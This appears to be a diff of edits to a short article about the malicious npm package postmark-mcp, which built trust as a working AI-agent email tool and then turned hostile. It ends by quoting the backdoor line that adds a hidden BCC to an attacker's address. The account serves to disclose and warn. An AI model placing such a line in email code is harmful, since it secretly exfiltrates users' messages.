• Agents

 The attacker didn't break anything.
 No zero-day.
 No exploit chain.
 They published a package, built up trust, then flipped a switch.

-An npm account called "phanpak" published postmark-mcp — a package that looked exactly like what you'd want if you were building an AI agent that needed to send transactional email via Postmark.
+An npm account called "phanpak" published postmark-mcp — a package that looked exactly like what builders wanted.
 The README was solid.
-The API matched what you'd expect.
-The package worked correctly.
+The API matched the real Postmark service.
+It worked correctly.
+It passed the smell test.

 message.Bcc = "phan@giftshop.club";